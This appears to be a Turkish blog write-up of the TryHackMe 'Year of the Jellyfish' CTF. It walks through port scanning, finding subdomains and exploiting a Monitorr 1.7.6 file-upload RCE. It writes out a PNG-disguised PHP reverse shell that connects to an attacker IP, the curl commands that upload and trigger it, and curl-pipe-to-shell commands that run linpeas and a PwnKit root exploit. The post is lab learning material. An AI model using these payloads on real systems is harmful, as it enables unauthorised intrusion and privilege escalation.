Akademi

Sosyal Medya

Year of the Jellyfish Writeup

Merhabalar bu yazımda Tryhackmede bulunan Year of the Jellyfish ctfinin çözümünü anlatmaya çalışacağım.

Ctf i başlatalım ve openvpnle bağlanalım. Verilen ip adresine nmap taraması yapalım

21/tcp open ftp vsftpd 3.0.322/tcp open ssh

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29

443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))

8000/tcp open http-alt

80 portunda robyns-petshop.thm adında bir site 443 te verilen bilgiye göre de 3 farklı dns bulunmakta

monitorr.robyns-petshop.thm,

beta.robyns-petshop.thm,

dev.robyns-petshop.thm

nano /etc/hosts dosyamıza bu dnsleri ve ip adresini ekleyelim

Artık hepsine ulaşabiliriz.

robyns-petshop.thm ye dizin taraması yaptığımda elle tutulur bilgiler elime geçmedi . Yüzlerce sayfa vardı. Diğer sayfalarda şansımı denemeye karar verdim.

monitorr.robyns-petshop.thm

Monitorr adına bir hizmet kontrolü sağlayan arayüz bulduk.

Monitorrun ana sayfasında jefflin adında bir site daha var açtığımızda ise

localhost:8086 yönlendiriyor . Aynı portu ctf in kendi ip adresinde denedim.

Jeflin adlı bir giriş sayfasına yönlendirdi.Monitorr adında bir exploit olup olmadığını araştırdım

default olarak exploiti çalıştırdığımızda shell vermiyor

Monitorr 1.7.6 yı aradığımda Remote Code Execution zafiyeti olduğunu buldum.

cat png dosyası oluşturup reverse shell yükleyelim içine

echo -e $’\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system(“bash -c \’bash -i >& /dev/tcp/10.8.128.38/443 0>&1\’”);’ > cat.png.php

Şimdi curl komutu ile oluşturduğumuz reverse shelli karşıya yüklememiz gerekiyor.

curl -k -F "[email protected]/cat.png.pHp" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "Cookie: isHuman=1"

nc ile portumuzu dinleyelim ve shelli çalıştıralım

curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/cat.png.php

user.txt dosyamız /var/www dizininin içinde bulunuyor . www-data kullanıcısı olarak oturum açtık.

Linpeas kurarak sistemi inceleyelim.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Pwnkit adında bir zafiyet olduğunu keşfettim.

sh -c “$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)”

pwnkit.sh dosyasını terminale çekerek çalıştıralım

root.txt dosyası /root dizinin altında bulunuyor .

Leave a Reply

Your email address will not be published.